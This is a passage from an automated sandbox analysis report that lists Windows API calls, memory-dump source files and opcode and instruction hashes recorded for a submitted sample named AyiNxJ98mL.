                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Window$A25940CurrentEnablePathPrepareThreadWrite
                                                              • String ID:
                                                              • API String ID: 390483697-0
                                                              • Opcode ID: 7310e4a240e1736cfb30b9abd7a9c8d32e29debdd45fb2130da0edd2c14fc99c
                                                              • Instruction ID: 552ca42e7a4f22222615ff1de8f8c20df724e6475abae56b3c63f202feb1ec23
                                                              • Opcode Fuzzy Hash: 7310e4a240e1736cfb30b9abd7a9c8d32e29debdd45fb2130da0edd2c14fc99c
                                                              • Instruction Fuzzy Hash: 28F0E270248300FFEB059BB2EDD6B2577E8E319716F91043BF504866D0EA795D40C96E
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                              • Instruction ID: d0e136ad155d69288fc423feb27b218c22c44688115b59a91c3ffefc647f2292
                                                              • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                              • Instruction Fuzzy Hash: F0F0FF70509209DBBB1CCF54D0919AF7B71EB59310F20806FE907877A0D6346A80D759
                                                              APIs
                                                              • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                              • Instruction ID: 39ad6e161323637dbb8254467e02d50acedd081d31d6b9d15e1adfc5f54150e8
                                                              • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                              • Instruction Fuzzy Hash: 6EF02BB2200510AFDB84CF9CD9C0F9373ECEB0C210B0481A6FA08CF24AD220EC108BB0
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                              • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                              • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                              • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004507F0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 838f498b19bb2aafec3be0ee987651bf511c4e6d2f63907cf4f88042037e4973
                                                              • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                              • Opcode Fuzzy Hash: 838f498b19bb2aafec3be0ee987651bf511c4e6d2f63907cf4f88042037e4973
                                                              • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                              APIs
                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD24,?,00000001,?,?,00000000,?,0042CD76,00000000,00452A11,00000000,00452A32,?,00000000), ref: 0042CD07
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: a570e9d0cc49cd9ea48ac8d9958fbde071fca7bece3969a5989dcb135d147aed
                                                              • Instruction ID: bebe06870d533199fa05ec681e6f815a7bc371a3e359dcca221b2f893a48d47d
                                                              • Opcode Fuzzy Hash: a570e9d0cc49cd9ea48ac8d9958fbde071fca7bece3969a5989dcb135d147aed
                                                              • Instruction Fuzzy Hash: 0AE06571304308BFD701EB62EC92A5EBBECD749714B914476B400D7592D5B86E008458
                                                              APIs
                                                              • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: FormatMessage
                                                              • String ID:
                                                              • API String ID: 1306739567-0
                                                              • Opcode ID: 1d16c149c237ab05d394d1dcd15bc1a2ba242a73302d35381885c392630e106f
                                                              • Instruction ID: 1e04b5e42f682bd3307758a00633d1e15c64123c11c882a5e2d093d9edca25ee
                                                              • Opcode Fuzzy Hash: 1d16c149c237ab05d394d1dcd15bc1a2ba242a73302d35381885c392630e106f
                                                              • Instruction Fuzzy Hash: E7E0D86178432126F23524166C43B7B110E43C0704FD080267A809F3D6D6EE9949425E
                                                              APIs
                                                              • CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                              • Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
                                                              • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                              • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                              APIs
                                                              • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE20
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: b59592ccec0b1853c0d50eb209755673f49d30f0d63234ebc8c06611609486a1
                                                              • Instruction ID: 00bf656f3cc58d957e3fc120c7d975a7f6f089e768df8f95d2ce2a55afbcf34e
                                                              • Opcode Fuzzy Hash: b59592ccec0b1853c0d50eb209755673f49d30f0d63234ebc8c06611609486a1
                                                              • Instruction Fuzzy Hash: 69E07EB2600119AF9B40DE8CDC81EEB37ADAB1D350F414016FA08E7200C274EC519BB4
                                                              APIs
                                                              • FindClose.KERNEL32(00000000,000000FF,00470C14,00000000,00471A10,?,00000000,00471A59,?,00000000,00471B92,?,00000000,?,00000000), ref: 00454BFA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseFind
                                                              • String ID:
                                                              • API String ID: 1863332320-0
                                                              • Opcode ID: cdb9c2b7633e0d7853738bb459b1a46babdaf032508dd36dba6af5da7df12373
                                                              • Instruction ID: 3c3cb6916585ff7422749358fc170cdffb6a73b651657da6609ae8be1e4b77d0
                                                              • Opcode Fuzzy Hash: cdb9c2b7633e0d7853738bb459b1a46babdaf032508dd36dba6af5da7df12373
                                                              • Instruction Fuzzy Hash: A7E065B0A056004BCB15DF3A858021A76D25FC5325F05C96AAC58CF397D63C84955656
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(004953B6,?,004953D8,?,?,00000000,004953B6,?,?), ref: 004146AB
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                              • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                              • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                              • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                              APIs
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F2C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                              • Instruction ID: 1f586823f232578dbf745533d190da316c23ef772c10fc749b20f2ce5ea51255
                                                              • Opcode Fuzzy Hash: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                              • Instruction Fuzzy Hash: E0D05B723091117AD620955F6C44DA76BDCCBC5770F11063EB558D72C1D7309C01C675
                                                              APIs
                                                                • Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D
                                                              • ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                • Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: InfoParametersSystem$ShowWindow
                                                              • String ID:
                                                              • API String ID: 3202724764-0
                                                              • Opcode ID: 6539159081c566a845655d997cb077fb8df4a929aa301bd67fb88950e555413a
                                                              • Instruction ID: 40ba6511a88705317f68f90b714cf273492cbff5df7e869aa0dea3a735aecdb5
                                                              • Opcode Fuzzy Hash: 6539159081c566a845655d997cb077fb8df4a929aa301bd67fb88950e555413a
                                                              • Instruction Fuzzy Hash: 89D05E123831B03106307BB72805ACB86AC8D966AB389047BB5409B302E91E8A0A61AC
                                                              APIs
                                                              • SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: TextWindow
                                                              • String ID:
                                                              • API String ID: 530164218-0
                                                              • Opcode ID: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                              • Instruction ID: 772c2b490b6417829154bcce5d0a54014a2db275ddfc333997dbbca6f26d49c5
                                                              • Opcode Fuzzy Hash: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                              • Instruction Fuzzy Hash: 7ED05EE27011702BCB01BAED54C4AC667CC9B8825AB1940BBF904EF257C678CE4083A8
                                                              APIs
                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,004515B7,00000000), ref: 0042CD3F
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 25b3c26d3c79b78b40e0be7c0404abf70c39e9d787657ef1c43052f1caeba7d8
                                                              • Instruction ID: 866207c2a99293721dc17515f5e31636ca325c5e587501d47fbe5ff4e718b97c
                                                              • Opcode Fuzzy Hash: 25b3c26d3c79b78b40e0be7c0404abf70c39e9d787657ef1c43052f1caeba7d8
                                                              • Instruction Fuzzy Hash: 77C08CE03222001A9A20A6BD2CC950F06CC891437A3A41F77B439E72E2D23DD8162018
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467B94,00000000,00000000,00000000,0000000C,00000000), ref: 00466EC4
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                              • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                              • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                              • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8D4,0040CE80,?,00000000,?), ref: 00406EE5
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 69b9da7e15ce352a50602e67f4a233c0d3270223495d3e32e43592fe9d1f4da4
                                                              • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                              • Opcode Fuzzy Hash: 69b9da7e15ce352a50602e67f4a233c0d3270223495d3e32e43592fe9d1f4da4
                                                              • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                              APIs
                                                              • SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                                • Part of subcall function 004506A0: GetLastError.KERNEL32(004504BC,00450762,?,00000000,?,004977FC,00000001,00000000,00000002,00000000,0049795D,?,?,00000005,00000000,00497991), ref: 004506A3
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLast
                                                              • String ID:
                                                              • API String ID: 734332943-0
                                                              • Opcode ID: 2f3da4ea7652235e9563b7b11f328aef08bde54833d269609cfe7e93d4b3e5df
                                                              • Instruction ID: d892f33e09ba9bc7304af59ed1bd982b4427bde6cd355302a364b0e8927efaaf
                                                              • Opcode Fuzzy Hash: 2f3da4ea7652235e9563b7b11f328aef08bde54833d269609cfe7e93d4b3e5df
                                                              • Instruction Fuzzy Hash: 2DC04CA9300101879F00BAAE95D190663D85E583057504066B944CF207D668D8144A18
                                                              APIs
                                                              • SetCurrentDirectoryA.KERNEL32(00000000,?,0049778A,00000000,0049795D,?,?,00000005,00000000,00497991,?,?,00000000), ref: 004072BB
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              • Opcode ID: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                              • Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
                                                              • Opcode Fuzzy Hash: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                              • Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514
                                                              APIs
                                                              • SetErrorMode.KERNEL32(?,0042E41D), ref: 0042E410
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
